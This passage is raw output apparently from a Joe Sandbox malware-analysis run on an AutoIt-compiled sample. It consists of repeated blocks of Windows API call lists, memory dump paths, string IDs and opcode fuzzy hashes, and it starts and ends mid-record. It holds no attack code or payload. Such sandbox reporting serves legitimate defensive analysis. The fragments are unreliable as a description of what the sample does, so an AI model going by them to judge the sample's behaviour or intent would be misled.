                                                            • OpenThreadToken.ADVAPI32(00000000,?,?,?,001F882E), ref: 001F8C6A
                                                            • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,001F882E), ref: 001F8C77
                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,001F882E), ref: 001F8C7E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: CurrentOpenProcessThreadToken
                                                            • String ID:
                                                            • API String ID: 3974789173-0
                                                            • Opcode ID: 0eb8a6417d320c2e99adeb5a85d2ddc0ea148f4049f7b62b5bb0d145b2143eed
                                                            • Instruction ID: c4cb8ca24672486ab2f8397a4f8e1d2a24a1b36d0bf79fc63e1bea6fd9a22db4
                                                            • Opcode Fuzzy Hash: 0eb8a6417d320c2e99adeb5a85d2ddc0ea148f4049f7b62b5bb0d145b2143eed
                                                            • Instruction Fuzzy Hash: 83E04F36646211EBD7709FF07E0DB963BB8AF557A2F045838A645CA040DB3484428B61
                                                            APIs
                                                            • GetDesktopWindow.USER32 ref: 001E2187
                                                            • GetDC.USER32(00000000), ref: 001E2191
                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 001E21B1
                                                            • ReleaseDC.USER32(?), ref: 001E21D2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                            • String ID:
                                                            • API String ID: 2889604237-0
                                                            • Opcode ID: 2167ffc3acd4a73a3032c70b819bd947926e21621e109b373e88781e6f9deaab
                                                            • Instruction ID: 5cd5419bd14559b0f91e83a54a15c6c413daa6f655016f61639662c93466283d
                                                            • Opcode Fuzzy Hash: 2167ffc3acd4a73a3032c70b819bd947926e21621e109b373e88781e6f9deaab
                                                            • Instruction Fuzzy Hash: 56E01AB5800614EFDB619FA0EA0CAAD7BF9EB5C350F118425F96A97220DB7881429F40
                                                            APIs
                                                            • GetDesktopWindow.USER32 ref: 001E219B
                                                            • GetDC.USER32(00000000), ref: 001E21A5
                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 001E21B1
                                                            • ReleaseDC.USER32(?), ref: 001E21D2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                            • String ID:
                                                            • API String ID: 2889604237-0
                                                            • Opcode ID: d5133a5266b3eaf0b65d28fc4dc672503ebaf2cc899f62a497132c4cac738ea6
                                                            • Instruction ID: bd1417f238fe377776f00ed67bdff87425dfa4bc9f410de75525b578619085a3
                                                            • Opcode Fuzzy Hash: d5133a5266b3eaf0b65d28fc4dc672503ebaf2cc899f62a497132c4cac738ea6
                                                            • Instruction Fuzzy Hash: 12E01A75800204AFCB619FB0EA0C6AD7BF5EB5C310F118025F96A97220DB7891429F40
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: %#
                                                            • API String ID: 0-2930062601
                                                            • Opcode ID: f60acc2f5962489fc063e416346ad2dee6d09d023beb8dfca47b0cc833ed950f
                                                            • Instruction ID: 60dc6c0b1b243490a5966c7d6f9a0a38f24d58bb12eea1c0b67353486b5d59bb
                                                            • Opcode Fuzzy Hash: f60acc2f5962489fc063e416346ad2dee6d09d023beb8dfca47b0cc833ed950f
                                                            • Instruction Fuzzy Hash: ADB12779D042099BCF14EF94C8919FEB7B9FF1A350F184026E902A7295EB349E82CB51
                                                            APIs
                                                            Strings
Similarity
• API ID: __itow_s
• String ID: xr&$xr&
• API String ID: 3653519197-4030113876
• Opcode ID: 1d663934c1647d1b1fe297326b294e1ad7d18195b95815406ca130785e997b27
• Instruction ID: 11f8ee5ba98b61349c640fb1159b0a288f275c839e6838ba722ffb1c7f7ae295
• Opcode Fuzzy Hash: 1d663934c1647d1b1fe297326b294e1ad7d18195b95815406ca130785e997b27
• Instruction Fuzzy Hash: F4B1A274A10209AFDB15DF54C890EEEB7F9FF69300F148059F9459B292EB70E991CB60
APIs
  • Part of subcall function 001BFEC6: _wcscpy.LIBCMT ref: 001BFEE9
  • Part of subcall function 001A9997: __itow.LIBCMT ref: 001A99C2
  • Part of subcall function 001A9997: __swprintf.LIBCMT ref: 001A9A0C
• __wcsnicmp.LIBCMT ref: 0020B298
• WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0020B361
Strings
Similarity
• API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
• String ID: LPT
• API String ID: 3222508074-1350329615
• Opcode ID: 7f9dc656fcb0b0c70764f56c237ff52cb414d1d1ee94c4c571cd72ba8f1dbcf7
• Instruction ID: e649b2c40c35aac661a663f42f46e5a27641a8f9852119febf55a5904384cd6f
• Opcode Fuzzy Hash: 7f9dc656fcb0b0c70764f56c237ff52cb414d1d1ee94c4c571cd72ba8f1dbcf7
• Instruction Fuzzy Hash: 10619775A10315EFCB25DF94C885EAEB7B4EF19310F1140A9F946AB392DB70AE90CB50
APIs
• Sleep.KERNEL32(00000000), ref: 001B2AC8
• GlobalMemoryStatusEx.KERNEL32(?), ref: 001B2AE1
Strings
Similarity
• API ID: GlobalMemorySleepStatus
• String ID: @
• API String ID: 2783356886-2766056989
• Opcode ID: 7bb98d68f020bd0e6b34fa7d8cf9d2952279ce513e139f94963ac49f6e458379
• Instruction ID: 27f352524ce5c648e68324fd38c17eeec1b403b3f30c42602c68b028055d808a
• Opcode Fuzzy Hash: 7bb98d68f020bd0e6b34fa7d8cf9d2952279ce513e139f94963ac49f6e458379
• Instruction Fuzzy Hash: 615156755187449BD320AF10D886BAFBBF8FF96314F42885DF1D9810A1EB308569CB26
APIs
  • Part of subcall function 001A506B: __fread_nolock.LIBCMT ref: 001A5089
• _wcscmp.LIBCMT ref: 00209AAE
• _wcscmp.LIBCMT ref: 00209AC1
Strings
Similarity
• API ID: _wcscmp$__fread_nolock
• String ID: FILE
• API String ID: 4029003684-3121273764
• Opcode ID: c693304c31043e9c5def3945476fa7b71506df0f052d314ad12033c672c6402f
• Instruction ID: 543b2cc88053b33cbee546628d4af19b0b2d1268572eb084cede295f2c67abdb
• Opcode Fuzzy Hash: c693304c31043e9c5def3945476fa7b71506df0f052d314ad12033c672c6402f
• Instruction Fuzzy Hash: 6841D671A0070ABADF209FA4DC46FEFBBB9DF55714F000069B901A71C2DB75AA548BA1
APIs
Strings
Similarity
• API ID: ClearVariant
• String ID: Dt&$Dt&
• API String ID: 1473721057-847724317
• Opcode ID: adfcce0997f8efde6be53326282883dbe637e83b18aa943d82b6775bd1764588
• Instruction ID: ef01723b8aa269e9c54b2cb52889edc12d67125384509f64abb72e2b903a7e0a
• Opcode Fuzzy Hash: adfcce0997f8efde6be53326282883dbe637e83b18aa943d82b6775bd1764588
• Instruction Fuzzy Hash: 5A51E4786083428FD754CF19D584A2ABBF1BF9A354F94885DF9858B321D771EC81CB42
APIs
• _memset.LIBCMT ref: 00212892
• InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 002128C8
Strings
Similarity
• API ID: CrackInternet_memset
• String ID: |
• API String ID: 1413715105-2343686810
• Opcode ID: d74962ab7dce79d9522e147a54ad67a73b2cbb2964880b196537cd680aa29603
• Instruction ID: 06eb15ad2abb785eda196f239fab491c0ce9a9688cc5c18e70f06e368d99e13b
• Opcode Fuzzy Hash: d74962ab7dce79d9522e147a54ad67a73b2cbb2964880b196537cd680aa29603
• Instruction Fuzzy Hash: 46314A71810119AFCF01EFA4DC85EEEBFB9FF29300F104029F814A6166DB315A66DBA0
APIs
• DestroyWindow.USER32(?,?,?,?), ref: 00226D86
• MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00226DC2
Strings
Similarity
• API ID: Window$DestroyMove
• String ID: static
• API String ID: 2139405536-2160076837
• Opcode ID: 512f5274584c0ef8357fa15acad11a6bc222d8a3d3c522dd3d25baa8aeee2602
• Instruction ID: e326dfe71493e478e636e5a793ae48cbf5fd9abe1aea3a4f4335f7ec9068b07a
• Opcode Fuzzy Hash: 512f5274584c0ef8357fa15acad11a6bc222d8a3d3c522dd3d25baa8aeee2602
• Instruction Fuzzy Hash: 78319072210219BADB109FB4DC48AFB73B9FF49720F108519F9A587190DB31ACA1CB60
APIs
• _memset.LIBCMT ref: 00202E00
• GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00202E3B
Strings
Similarity
• API ID: InfoItemMenu_memset
• String ID: 0
• API String ID: 2223754486-4108050209
• Opcode ID: 1d7fc8fb5c5037ffd4dbbaa76243ee37a9e430a02de9c85ecca7a3fe9d6ee201
• Instruction ID: c1f0e78626c832e815716e0ad3994064c90be76405c8284c9ac5ec465da064aa
• Opcode Fuzzy Hash: 1d7fc8fb5c5037ffd4dbbaa76243ee37a9e430a02de9c85ecca7a3fe9d6ee201
• Instruction Fuzzy Hash: FC31F731A50306EBEB248F58D84DB9EBBB9FF05340F14406FE985A61E2D770A968CB50
APIs
• SendMessageW.USER32(00000000,00000143,00000000,?), ref: 002269D0
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 002269DB
Strings
Similarity
• API ID: MessageSend
• String ID: Combobox
• API String ID: 3850602802-2096851135
• Opcode ID: f786361da6664f67becd352393a6ed905e6efd4a2bccafa66bc3d6418b91758d
• Instruction ID: 588cd756fb121d57bd030dc7ca418a03cee59af8bd04b1be81c8276bcb0a4306
• Opcode Fuzzy Hash: f786361da6664f67becd352393a6ed905e6efd4a2bccafa66bc3d6418b91758d
• Instruction Fuzzy Hash: 13110B7232011A7FEF119F94DC84EFB376EEB45354F100124F95897290DA719CA187A0
APIs
  • Part of subcall function 001A1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 001A1D73
  • Part of subcall function 001A1D35: GetStockObject.GDI32(00000011), ref: 001A1D87
  • Part of subcall function 001A1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 001A1D91
• GetWindowRect.USER32(00000000,?), ref: 00226EE0
• GetSysColor.USER32(00000012), ref: 00226EFA
Strings
Similarity
• API ID: Window$ColorCreateMessageObjectRectSendStock
• String ID: static
• API String ID: 1983116058-2160076837
• Opcode ID: d6af94071a3df5ec5f523fbb2b5969c4fa65590a65e7eae23fc187d573b39098
• Instruction ID: 46fb1caea0c517cef3181c99c20d1ce3ac2bad7dd78b446784dc4db4711e0076
• Opcode Fuzzy Hash: d6af94071a3df5ec5f523fbb2b5969c4fa65590a65e7eae23fc187d573b39098
• Instruction Fuzzy Hash: 1521477262021ABFDB04DFE8ED49EEA7BB8EB08314F104628F955D2250D774A8619B50
APIs
• GetWindowTextLengthW.USER32(00000000), ref: 00226C11
• SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00226C20
Strings
Similarity
• API ID: LengthMessageSendTextWindow
• String ID: edit
• API String ID: 2978978980-2167791130
• Opcode ID: 0bcfe80041a8cac7a5854da5bdf85bfa39bfb9007618bb555b70205653d74261
• Instruction ID: c4bb891a6d3bf7e7f8758e5e607ba74fb6e88c77071c4234a407aa350012d67f
• Opcode Fuzzy Hash: 0bcfe80041a8cac7a5854da5bdf85bfa39bfb9007618bb555b70205653d74261
• Instruction Fuzzy Hash: 7B11DD72120119BBEB205EA4AC49AFA3769EB05378F604724F960E71E0C775DCA19B20
APIs
• _memset.LIBCMT ref: 00202F11
• GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00202F30
Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: InfoItemMenu_memset
                                                            • String ID: 0
                                                            • API String ID: 2223754486-4108050209
                                                            • Opcode ID: 7d0d7b8c88527129bb62d6f149571cbec74c070065872401577db909cb400920
                                                            • Instruction ID: 506866a77c26164a17291d2b7b8c1c20d5493f264b02b5a9922d334a4c04e05a
                                                            • Opcode Fuzzy Hash: 7d0d7b8c88527129bb62d6f149571cbec74c070065872401577db909cb400920
                                                            • Instruction Fuzzy Hash: CE11BE32921316EBCB21DE98DC0CB9973B9AB01350F1440A6FC54A72E2D7B0AD288791
                                                            APIs
                                                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00212520
                                                            • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00212549
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Internet$OpenOption
                                                            • String ID: <local>
                                                            • API String ID: 942729171-4266983199
                                                            • Opcode ID: 1d599e1622dadf060d841fb8fd9bd506a76fe334fd9e0accf5a961a75318e263
                                                            • Instruction ID: 13d0f34dd3bcb0c5f690ddfedf265557dde2f7599b999e93fff25184c0cf1502
                                                            • Opcode Fuzzy Hash: 1d599e1622dadf060d841fb8fd9bd506a76fe334fd9e0accf5a961a75318e263
                                                            • Instruction Fuzzy Hash: 9A11E370121226FADB288F518CD9EFBFFA9FB26351F50812AF90546040D2B059B9D6E0
                                                            APIs
                                                              • Part of subcall function 0021830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,002180C8,?,00000000,?,?), ref: 00218322
                                                            • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 002180CB
                                                            • htons.WSOCK32(00000000,?,00000000), ref: 00218108
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWidehtonsinet_addr
                                                            • String ID: 255.255.255.255
                                                            • API String ID: 2496851823-2422070025
                                                            • Opcode ID: 95562144c1566f016609d1583f3cb85f5a74fbc96e45d76711cb36b53c5a59a4
                                                            • Instruction ID: d056605630fb2f0088338a861a1890d379111bdd8ad6f10a021bf40144416804
                                                            • Opcode Fuzzy Hash: 95562144c1566f016609d1583f3cb85f5a74fbc96e45d76711cb36b53c5a59a4
                                                            • Instruction Fuzzy Hash: 7511E575610209ABCB20AF64CC86FFDB3B4FF24320F108526F91597291DB71A865C655
                                                            APIs
                                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,001A3C26,002662F8,?,?,?), ref: 001B0ACE
                                                              • Part of subcall function 001A7D2C: _memmove.LIBCMT ref: 001A7D66
                                                            • _wcscat.LIBCMT ref: 001E50E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: FullNamePath_memmove_wcscat
                                                            • String ID: c&
                                                            • API String ID: 257928180-2028742917
                                                            • Opcode ID: 2e5bbfed4e6578dda3a27a8c1aa60b5c2463368b831be3e27d60506118709d38
                                                            • Instruction ID: bc5b436e4479f580b11bca31f208335fecb5dbc00916d9c83f7262d22af489e8
                                                            • Opcode Fuzzy Hash: 2e5bbfed4e6578dda3a27a8c1aa60b5c2463368b831be3e27d60506118709d38
                                                            • Instruction Fuzzy Hash: 3811A13990420CAB8B51EBA4DD06EDE77B9EF1C750F0040E6F988D7281EB70DB948B51
                                                            APIs
                                                              • Part of subcall function 001A7F41: _memmove.LIBCMT ref: 001A7F82
                                                              • Part of subcall function 001FB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 001FB0E7
                                                            • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 001F9355
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameSend_memmove
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 372448540-1403004172
                                                            • Opcode ID: 01437a71ff5941c0f64e9abd1e8a83786a127ec301413fdb466d43b0c6f605cf
                                                            • Instruction ID: 2051eaa65beea14aaaba33b560ee8ee2b001550b3e08bfd4aee1184abab08f23
                                                            • Opcode Fuzzy Hash: 01437a71ff5941c0f64e9abd1e8a83786a127ec301413fdb466d43b0c6f605cf
                                                            • Instruction Fuzzy Hash: C401DEB5A45218AB8B08FBA4CC91DFE7369BF16320B100619BA32572D2EB31591C8660
                                                            APIs
                                                              • Part of subcall function 001A7F41: _memmove.LIBCMT ref: 001A7F82
                                                              • Part of subcall function 001FB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 001FB0E7
                                                            • SendMessageW.USER32(?,00000180,00000000,?), ref: 001F924D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameSend_memmove
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 372448540-1403004172
                                                            • Opcode ID: e7694b292c734cb05e3e5005ee18416e57f66056de42866e4fab3770887a9569
                                                            • Instruction ID: f2862a3425d45765128d518c7bc3aaca5b877035f308cbcf97ea1be8f44b9d9c
                                                            • Opcode Fuzzy Hash: e7694b292c734cb05e3e5005ee18416e57f66056de42866e4fab3770887a9569
                                                            • Instruction Fuzzy Hash: 12018875A452087BCB14F7A0C992EFF73AC9F56300F1400157A12671C2EB155F1C9671
                                                            APIs
                                                              • Part of subcall function 001A7F41: _memmove.LIBCMT ref: 001A7F82
                                                              • Part of subcall function 001FB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 001FB0E7
                                                            • SendMessageW.USER32(?,00000182,?,00000000), ref: 001F92D0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameSend_memmove
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 372448540-1403004172
                                                            • Opcode ID: 17cce26e31aad051e15ec4b485ceaab417e37256466db88f0650b681abde02aa
                                                            • Instruction ID: b4c96da6a27d09dc173180096bb119aadf14cd548646a2f3a644154e823b84d6
                                                            • Opcode Fuzzy Hash: 17cce26e31aad051e15ec4b485ceaab417e37256466db88f0650b681abde02aa
                                                            • Instruction Fuzzy Hash: 2D01A775A452087BCF14F7A4C992EFF77AC9F22340F5401157912631C2EB215F1C9675
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: __calloc_crt
                                                            • String ID: @R&
                                                            • API String ID: 3494438863-3579571961
                                                            • Opcode ID: 665af2bc0e51346531c5afbeb5fa6532a8c2e15c66197fe8345fcb1be7484f3e
                                                            • Instruction ID: 57f1063aee229fbdce23edb339fb623a1d10cc3e5fea6823b438fafb6bd017d8
                                                            • Opcode Fuzzy Hash: 665af2bc0e51346531c5afbeb5fa6532a8c2e15c66197fe8345fcb1be7484f3e
                                                            • Instruction Fuzzy Hash: 82F06271308716ABF728CF98FD69FA52795E730720F10842FE941CB594EBB0C8818685
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ClassName_wcscmp
                                                            • String ID: #32770
                                                            • API String ID: 2292705959-463685578
                                                            • Opcode ID: b22587baa0e73811c8b41bed591cfc8019dfcbea8c1887d44be9148fd71d5bae
                                                            • Instruction ID: d643d60906393f61d3c62e1d06851232e86f4458beeb7a604632f3c24a46cfc2
                                                            • Opcode Fuzzy Hash: b22587baa0e73811c8b41bed591cfc8019dfcbea8c1887d44be9148fd71d5bae
                                                            • Instruction Fuzzy Hash: 16E02232A003292AE320AA99AC0AFA7F7ACEF55721F00016AFD10D3041E6609A158BE1
                                                            APIs
                                                            • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 001F81CA
                                                              • Part of subcall function 001C3598: _doexit.LIBCMT ref: 001C35A2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
